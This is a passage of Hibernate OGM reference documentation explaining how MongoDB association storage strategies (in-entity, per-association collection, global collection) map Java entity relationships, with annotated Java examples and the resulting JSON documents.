strategies are:\n\n* <<mongodb-in-entity-strategy, IN_ENTITY>> (default)\n* <<mongodb-association-document-strategy, ASSOCIATION_DOCUMENT>>, using a global collection for all associations\n* <<mongodb-collection-per-association-strategy, COLLECTION_PER_ASSOCIATION>>, using a dedicated collection for each association\n\nTo switch between these strategies, use one of the three approaches to options:\n\n* annotate your entity with the `@AssociationStorage` and `@AssociationDocumentStorage` annotations (see <<ogm-mongodb-annotation-configuration>>),\n* use the API for programmatic configuration (see <<ogm-mongodb-programmatic-configuration>>)\n* or specify a default strategy via the `hibernate.ogm.datastore.document.association_storage` and\n`hibernate.ogm.mongodb.association_document_storage` configuration properties (see the bootstrap sketch below).\n\n[[mongodb-in-entity-strategy]]\n===== In Entity strategy\n\n* <<mongodb-in-entity-to-one-associations, *-to-one associations>>\n* <<mongodb-in-entity-to-many-associations, *-to-many associations>>\n\n
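Before walking through the in-entity mappings, here is the bootstrap sketch referenced in the list of configuration approaches above. It is a minimal illustration, not taken from the reference material: the persistence unit name `ogm-mongodb-pu` is hypothetical, and the enum-style values (`ASSOCIATION_DOCUMENT`, `GLOBAL_COLLECTION`) are assumptions about the accepted property values:\n\n[source, JAVA]\n----\n\/\/ Hedged sketch: selecting association storage defaults at bootstrap time.\n\/\/ The property names are the ones mentioned above; the values are assumed.\nMap<String, String> properties = new HashMap<String, String>();\nproperties.put( \"hibernate.ogm.datastore.document.association_storage\", \"ASSOCIATION_DOCUMENT\" );\nproperties.put( \"hibernate.ogm.mongodb.association_document_storage\", \"GLOBAL_COLLECTION\" );\n\nEntityManagerFactory emf = Persistence.createEntityManagerFactory( \"ogm-mongodb-pu\", properties );\n----\n\nIn this strategy, Hibernate OGM stores the id(s) of the associated entity(ies)\ninto the entity 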
document itself.\nThis field stores the id value for to-one associations and an array of id values for to-many associations.\nAn embedded id will be represented by a nested document.\nFor indexed collections (i.e. `List` or `Map`), the index will be stored along the id.\n\n[NOTE]\n====\nWhen using this strategy the annotations `@JoinTable` will be ignored because no collection is created\nfor associations.\n\nYou can use `@JoinColumn` to change the name of the field that stores the foreign key (as an example, see\n<<mongodb-in-entity-one-to-one-join-column>>).\n====\n\n[[mongodb-in-entity-to-one-associations]]\n===== To-one associations\n\n.Unidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicle {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n private Vehicle vehicle;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"brand\" : \"Mercedes\"\n}\n----\n\nWheel collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"W001\",\n \"diameter\" : 0,\n \"vehicle_id\" : \"V_01\"\n}\n----\n====\n\n[[mongodb-in-entity-one-to-one-join-column]]\n.Unidirectional one-to-one with @JoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicle {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @JoinColumn( name = \"part_of\" )\n private Vehicle vehicle;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"brand\" : \"Mercedes\"\n}\n----\n\nWheel collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"W001\",\n \"diameter\" : 0,\n \"part_of\" : \"V_01\"\n}\n----\n====\n\nIn a true one-to-one association, it is possible to share the same id between the two entities\nand therefore a foreign key is not required. 
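The mapping for this case is shown in the example just below; as a complement, here is a hypothetical usage sketch (standard accessors and an `em` variable are assumed) illustrating that, with `@MapsId`, the association must be populated before persisting, since the `Wheel` derives its identifier from its `Vehicle`:\n\n[source, JAVA]\n----\n\/\/ Hypothetical usage sketch: with @MapsId the Wheel takes its \"_id\"\n\/\/ from the associated Vehicle, so set the association before persisting.\nVehicle vehicle = new Vehicle();\nvehicle.setId( \"V_01\" );\nvehicle.setBrand( \"Mercedes\" );\n\nWheel wheel = new Wheel();\nwheel.setDiameter( 0 );\nwheel.setVehicle( vehicle ); \/\/ \"V_01\" is propagated to the wheel's _id\n\nem.persist( vehicle );\nem.persist( wheel );\n----\n\n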
You can see how to map this type of association in\nthe following example:\n\n.Unidirectional one-to-one with @MapsId and @PrimaryKeyJoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicle {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @PrimaryKeyJoinColumn\n @MapsId\n private Vehicle vehicle;\n\n \/\/ getters, setters ...\n}\n----\n\nVehicle collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"brand\" : \"Mercedes\"\n}\n----\n\nWheel collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"diameter\" : 0,\n}\n----\n====\n\n.Bidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Husband {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Wife wife;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wife {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Husband husband;\n\n \/\/ getters, setters ...\n}\n----\n\nHusband collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"alex\",\n \"name\" : \"Alex\",\n \"wife\" : \"bea\"\n}\n----\n\nWife collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"bea\",\n \"name\" : \"Bea\",\n \"husband\" : \"alex\"\n}\n----\n====\n\n.Unidirectional many-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class JavaUserGroup {\n\n @Id\n private String jugId;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Member {\n\n @Id\n private String id;\n private String name;\n\n @ManyToOne\n private JavaUserGroup memberOf;\n\n \/\/ getters, setters ...\n}\n----\n\nJavaUserGroup collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"summer_camp\",\n \"name\" : \"JUG Summer Camp\"\n}\n----\n\nMember collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"jerome\",\n \"name\" : \"Jerome\"\n \"memberOf_jugId\" : \"summer_camp\"\n}\n{\n \"_id\" : \"emmanuel\",\n \"name\" : \"Emmanuel Bernard\"\n \"memberOf_jugId\" : \"summer_camp\"\n}\n----\n====\n\n.Bidirectional many-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class SalesForce {\n\n @Id\n private String id;\n private String corporation;\n\n @OneToMany(mappedBy = \"salesForce\")\n private Set<SalesGuy> salesGuys = new HashSet<SalesGuy>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class SalesGuy {\n private String id;\n private String name;\n\n @ManyToOne\n private SalesForce salesForce;\n\n \/\/ getters, setters ...\n}\n----\n\nSalesForce collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"red_hat\",\n \"corporation\" : \"Red Hat\",\n \"salesGuys\" : [ \"eric\", \"simon\" ]\n}\n----\n\nSalesGuy collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"eric\",\n \"name\" : \"Eric\"\n \"salesForce_id\" : \"red_hat\",\n}\n{\n \"_id\" : \"simon\",\n \"name\" : \"Simon\",\n \"salesForce_id\" : \"red_hat\"\n}\n----\n====\n\n.Bidirectional many-to-one between entities with embedded ids\n====\n[source, JAVA]\n----\n@Entity\npublic class Game {\n\n @EmbeddedId\n private GameId id;\n\n private String name;\n\n @ManyToOne\n private Court playedOn;\n\n \/\/ getters, setters ...\n}\n\n\npublic class GameId implements Serializable {\n\n private String category;\n\n @Column(name = \"id.gameSequenceNo\")\n private int sequenceNo;\n\n \/\/ getters, setters ...\n \/\/ equals \/ hashCode\n}\n\n@Entity\npublic class Court {\n\n @EmbeddedId\n 
private CourtId id;\n\n private String name;\n\n @OneToMany(mappedBy = \"playedOn\")\n private Set<Game> games = new HashSet<Game>();\n\n \/\/ getters, setters ...\n}\n\npublic class CourtId implements Serializable {\n\n private String countryCode;\n private int sequenceNo;\n\n \/\/ getters, setters ...\n \/\/ equals \/ hashCode\n}\n----\n\n.Court collection\n[source, JSON]\n----\n{\n \"_id\" : {\n \"countryCode\" : \"DE\",\n \"sequenceNo\" : 123\n },\n \"name\" : \"Hamburg Court\",\n \"games\" : [\n { \"gameSequenceNo\" : 457, \"category\" : \"primary\" },\n { \"gameSequenceNo\" : 456, \"category\" : \"primary\" }\n ]\n}\n----\n\n.Game collection\n[source, JSON]\n----\n{\n \"_id\" : {\n \"category\" : \"primary\",\n \"gameSequenceNo\" : 456\n },\n \"name\" : \"The game\",\n \"playedOn_id\" : {\n \"countryCode\" : \"DE\",\n \"sequenceNo\" : 123\n }\n}\n{\n \"_id\" : {\n \"category\" : \"primary\",\n \"gameSequenceNo\" : 457\n },\n \"name\" : \"The other game\",\n \"playedOn_id\" : {\n \"countryCode\" : \"DE\",\n \"sequenceNo\" : 123\n }\n}\n----\n====\n\nHere we see that the embedded id is represented as a nested document\nand directly referenced by the associations.\n\n[[mongodb-in-entity-to-many-associations]]\n===== To-many associations\n\n.Unidirectional one-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\",\n \"products\" : [ \"Beer\", \"Pretzel\" ]\n}\n----\n\nProduct collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n====\n\n.Unidirectional one-to-many with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\",\n \"products\" : [\n {\n \"products_name\" : \"Pretzel\",\n \"products_ORDER\" : 1\n },\n {\n \"products_name\" : \"Beer\",\n \"products_ORDER\" : 0\n }\n ]\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n====\n\nA map can be used to represent an association,\nin this case Hibernate OGM will store the key of the map\nand the associated id.\n\n.Unidirectional one-to-many using maps with defaults\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n private Map<String, Address> addresses = new HashMap<String, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\nUser collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"user_001\",\n \"addresses\" : [\n {\n 
\"work\" : \"address_001\",\n \"home\" : \"address_002\"\n }\n ]\n}\n----\n\nAddress collection as JSON in MongoDB\n\n[source, JSON]\n----\n{ \"_id\" : \"address_001\", \"city\" : \"Rome\" }\n{ \"_id\" : \"address_002\", \"city\" : \"Paris\" }\n----\n====\n\nIf the map value cannot be represented by a single field (e.g. when referencing a type with a composite id\nor using an embeddable type as map value type),\na sub-document containing all the required fields will be stored as value.\n\nIf the map key either is not of type `String` or it is made up of several columns (composite map key),\nthe optimized structure shown in the example above cannot be used as MongoDB only allows for Strings as field names.\nIn that case the association will be represented by a list of sub-documents, also containing the map key column(s).\nYou can use `@MapKeyColumn` to rename the field containing the key of the map,\notherwise it will default to \"<%COLLECTION_ROLE%>_KEY\", e.g. \"addresses_KEY\".\n\n.Unidirectional one-to-many using maps with @MapKeyColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n @MapKeyColumn(name = \"addressType\")\n private Map<Long, Address> addresses = new HashMap<Long, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\nUser collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"user_001\",\n \"addresses\" : [\n {\n \"addressType\" : 1,\n \"addresses_id\" : \"address_001\"\n },\n {\n \"addressType\" : 2,\n \"addresses_id\" : \"address_002\"\n }\n ]\n}\n----\n\nAddress collection as JSON in MongoDB\n\n[source, JSON]\n----\n{ \"_id\" : \"address_001\", \"city\" : \"Rome\" }\n{ \"_id\" : \"address_002\", \"city\" : \"Paris\" }\n----\n====\n\nIn case you want to enforce the list-style represention also for maps with a single key column of type `String`\n(e.g. 
when reading back data persisted by earlier versions of Hibernate OGM),\nyou can do so by setting the option `hibernate.ogm.datastore.document.map_storage` to the value `AS_LIST`.\n\n.Unidirectional many-to-many using in entity strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nStudent collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john\",\n \"name\" :\"John Doe\" }\n{\n \"_id\" : \"mario\",\n \"name\" : \"Mario Rossi\"\n}\n{\n \"_id\" : \"kate\",\n \"name\" : \"Kate Doe\"\n}\n----\n\nClassRoom collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"lesson\" : \"Math\"\n \"students\" : [\n \"mario\",\n \"john\"\n ]\n}\n{\n \"_id\" : NumberLong(2),\n \"lesson\" : \"English\"\n \"students\" : [\n \"mario\",\n \"kate\"\n ]\n}\n----\n====\n\n.Bidirectional many-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany( mappedBy = \"bankAccounts\" )\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner_1\",\n \"SSN\" : \"0123456\"\n \"bankAccounts\" : [ \"account_1\" ]\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n \"owners\" : [ \"owner_1\", \"owner2222\" ]\n}\n----\n====\n\n.Ordered list with embedded id\n====\n[source, JAVA]\n----\n@Entity\npublic class Race {\n @EmbeddedId\n private RaceId raceId;\n\n @OrderColumn(name = \"ranking\")\n @OneToMany @JoinTable(name = \"Race_Runners\")\n private List<Runner> runnersByArrival = new ArrayList<Runner>();\n\n \/\/ getters, setters ...\n}\n\npublic class RaceId implements Serializable {\n private int federationSequence;\n private int federationDepartment;\n\n \/\/ getters, setters, equals, hashCode\n}\n\n@Entity\npublic class Runner {\n @EmbeddedId\n private RunnerId runnerId;\n private int age;\n\n \/\/ getters, setters ...\n}\n\npublic class RunnerId implements Serializable {\n private String firstname;\n private String lastname;\n\n \/\/ getters, setters, equals, hashCode\n}\n----\n\n.Race collection\n[source, JSON]\n----\n{\n \"_id\": {\n \"federationDepartment\": 75,\n \"federationSequence\": 23\n },\n \"runnersByArrival\": [{\n \"firstname\": \"Pere\",\n \"lastname\": \"Noel\",\n \"ranking\": 1\n }, {\n \"firstname\": \"Emmanuel\",\n \"lastname\": \"Bernard\",\n \"ranking\": 0\n }]\n}\n----\n\n.Runner collection\n[source, JSON]\n----\n{\n \"_id\": {\n \"firstname\": \"Pere\",\n \"lastname\": \"Noel\"\n },\n \"age\": 105\n} {\n \"_id\": {\n \"firstname\": \"Emmanuel\",\n \"lastname\": \"Bernard\"\n },\n \"age\": 37\n}\n----\n====\n\n[[mongodb-collection-per-association-strategy]]\n===== One collection per association strategy\n\nIn this strategy, Hibernate OGM creates a MongoDB collection per association\nin which it will store all navigation information for that particular association.\n\nThis is the strategy closest to the relational model.\nIf an 
entity A is related to B and C, 2 collections will be created.\nThe name of such a collection is the name of the association table, prefixed with `associations_`.\n\nFor example, if `BankAccount` and `Owner` are related,\nthe collection used to store the association will be named `associations_Owner_BankAccount`.\nThe prefix is useful to quickly distinguish the association collections from the entity collections.\nYou can also decide to rename the collection representing the association using `@JoinTable`\n(see <<mongodb-one-collection-strategy-join-table, an example>>).\n\nEach document of an association collection has the following structure:\n\n* `_id` contains the id of the owner of the relationship\n* `rows` contains all the ids of the related entities\n\n[NOTE]\n====\nThe preferred approach is to use the <<mongodb-in-entity-strategy, in-entity strategy>>,\nbut this approach can alleviate the problem of having documents that are too big.\n====\n\n.Unidirectional relationship\n====\n[source, JSON]\n----\n{\n \"_id\" : { \"owners_id\" : \"owner0001\" },\n \"rows\" : [\n \"accountABC\",\n \"accountXYZ\"\n ]\n}\n----\n====\n\n.Bidirectional relationship\n====\n[source, JSON]\n----\n{\n \"_id\" : { \"owners_id\" : \"owner0001\" },\n \"rows\" : [ \"accountABC\", \"accountXYZ\" ]\n}\n{\n \"_id\" : { \"bankAccounts_id\" : \"accountXYZ\" },\n \"rows\" : [ \"owner0001\" ]\n}\n----\n====\n\n[NOTE]\n====\nThis strategy won't affect *-to-one associations or embedded collections.\n====\n\n.Unidirectional one-to-many using one collection per association strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nassociations_Basket_Product collection\n\n[source, JSON]\n----\n{\n \"_id\" : { \"Basket_id\" : \"davide_basket\" },\n \"rows\" : [ \"Beer\", \"Pretzel\" ]\n}\n----\n====\n\nThe order of the elements in the list can be preserved using `@OrderColumn`.\nHibernate OGM will store the order by adding an additional field to the document\ncontaining the association.\n\n.Unidirectional one-to-many using one collection per association strategy with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n @OrderColumn\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nassociations_Basket_Product collection\n\n[source, JSON]\n----\n{\n \"_id\" : { \"Basket_id\" : \"davide_basket\" },\n \"rows\" : [\n {\n \"products_name\" : \"Pretzel\",\n 
\"products_ORDER\" : 1\n },\n {\n \"products_name\" : \"Beer\",\n \"products_ORDER\" : 0\n }\n ]\n}\n----\n====\n\n.Unidirectional many-to-many using one collection per association strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nStudent collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john\",\n \"name\" : \"John Doe\"\n}\n{\n \"_id\" : \"mario\",\n \"name\" : \"Mario Rossi\"\n}\n{\n \"_id\" : \"kate\",\n \"name\" : \"Kate Doe\"\n}\n----\n\nClassRoom collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"lesson\" : \"Math\"\n}\n{\n \"_id\" : NumberLong(2),\n \"lesson\" : \"English\"\n}\n----\n\nassociations_ClassRoom_Student\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(1),\n },\n \"rows\" : [ \"john\", \"mario\" ]\n}\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(2),\n },\n \"rows\" : [ \"mario\", \"kate\" ]\n}\n----\n====\n\n.Bidirectional many-to-many using one collection per association strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany(mappedBy = \"bankAccounts\")\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner_1\",\n \"SSN\" : \"0123456\"\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n}\n----\n\nassociations_AccountOwner_BankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"bankAccounts_id\" : \"account_1\"\n },\n \"rows\" : [ \"owner_1\" ]\n}\n{\n \"_id\" : {\n \"owners_id\" : \"owner_1\"\n },\n \"rows\" : [ \"account_1\" ]\n}\n----\n====\n\n[[mongodb-one-collection-strategy-join-table]]\nYou can change the name of the collection containing the association using the `@JoinTable` annotation.\nIn the following example, the name of the collection containing the association is `OwnerBankAccounts`\n(instead of the default `associations_AccountOwner_BankAccount`)\n\n.Bidirectional many-to-many using one collection per association strategy and @JoinTable\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n @JoinTable( name = \"OwnerBankAccounts\" )\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany(mappedBy = \"bankAccounts\")\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner_1\",\n \"SSN\" : \"0123456\"\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n}\n----\n\nOwnerBankAccount\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"bankAccounts_id\" : \"account_1\"\n },\n \"rows\" : [ \"owner_1\" ]\n}\n{\n \"_id\" : {\n 
\"owners_id\" : \"owner_1\"\n },\n \"rows\" : [ \"account_1\" ]\n}\n----\n====\n\n[[mongodb-association-document-strategy]]\n===== Global collection strategy\n\nWith this strategy, Hibernate OGM creates a single collection named `Associations`\nin which it will store all navigation information for all associations.\nEach document of this collection is structured in 2 parts.\nThe first is the `_id` field which contains the identifier information\nof the association owner and the name of the association table.\nThe second part is the `rows` field which stores (into an embedded collection) all ids\nthat the current instance is related to.\n\n[NOTE]\n====\nThis strategy won't affect *-to-one associations or embedded collections.\n\nGenerally, you should not make use of this strategy\nunless embedding the association information proves to be too big for your document\nand you wish to separate them.\n====\n\n.Associations collection containing unidirectional association\n====\n[source, JSON]\n----\n{\n \"_id\": {\n \"owners_id\": \"owner0001\",\n \"table\": \"AccountOwner_BankAccount\"\n },\n \"rows\": [ \"accountABC\", \"accountXYZ\" ]\n}\n----\n====\n\nFor a bidirectional relationship, another document is created where ids are reversed.\nDon't worry, Hibernate OGM takes care of keeping them in sync:\n\n.Associations collection containing a bidirectional association\n====\n[source, JSON]\n----\n{\n \"_id\": {\n \"owners_id\": \"owner0001\",\n \"table\": \"AccountOwner_BankAccount\"\n },\n \"rows\": [ \"accountABC\", \"accountXYZ\" ]\n}\n{\n \"_id\": {\n \"bankAccounts_id\": \"accountXYZ\",\n \"table\": \"AccountOwner_BankAccount\"\n },\n \"rows\": [ \"owner0001\" ]\n}\n----\n====\n\n.Unidirectional one-to-many using global collection strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nAssociations collection\n[source, JSON]\n----\n{\n \"_id\" : {\n \"Basket_id\" : \"davide_basket\",\n \"table\" : \"Basket_Product\"\n },\n \"rows\" : [\n {\n \"products_name\" : \"Pretzel\",\n \"products_ORDER\" : 1\n },\n {\n \"products_name\" : \"Beer\",\n \"products_ORDER\" : 0\n }\n ]\n}\n----\n====\n\n.Unidirectional one-to-many using global collection strategy with `@JoinTable`\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n \/\/ It will change the value stored in the field table in the Associations collection\n @JoinTable( name = \"BasketContent\" )\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel 
Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nAssociations collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"Basket_id\" : \"davide_basket\",\n \"table\" : \"BasketContent\"\n },\n \"rows\" : [ \"Beer\", \"Pretzel\" ]\n}\n----\n====\n\n.Unidirectional many-to-many using global collection strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nStudent collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john\",\n \"name\" : \"John Doe\"\n}\n{\n \"_id\" : \"mario\",\n \"name\" : \"Mario Rossi\"\n}\n{\n \"_id\" : \"kate\",\n \"name\" : \"Kate Doe\"\n}\n----\n\nClassRoom collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"lesson\" : \"Math\"\n}\n{\n \"_id\" : NumberLong(2),\n \"lesson\" : \"English\"\n}\n----\n\nAssociations collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(1),\n \"table\" : \"ClassRoom_Student\"\n },\n \"rows\" : [ \"john\", \"mario\" ]\n}\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(2),\n \"table\" : \"ClassRoom_Student\"\n },\n \"rows\" : [ \"mario\", \"kate\" ]\n}\n----\n====\n\n.Bidirectional many-to-many using global collection strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany(mappedBy = \"bankAccounts\")\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner0001\",\n \"SSN\" : \"0123456\"\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n}\n----\n\nAssociations collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n 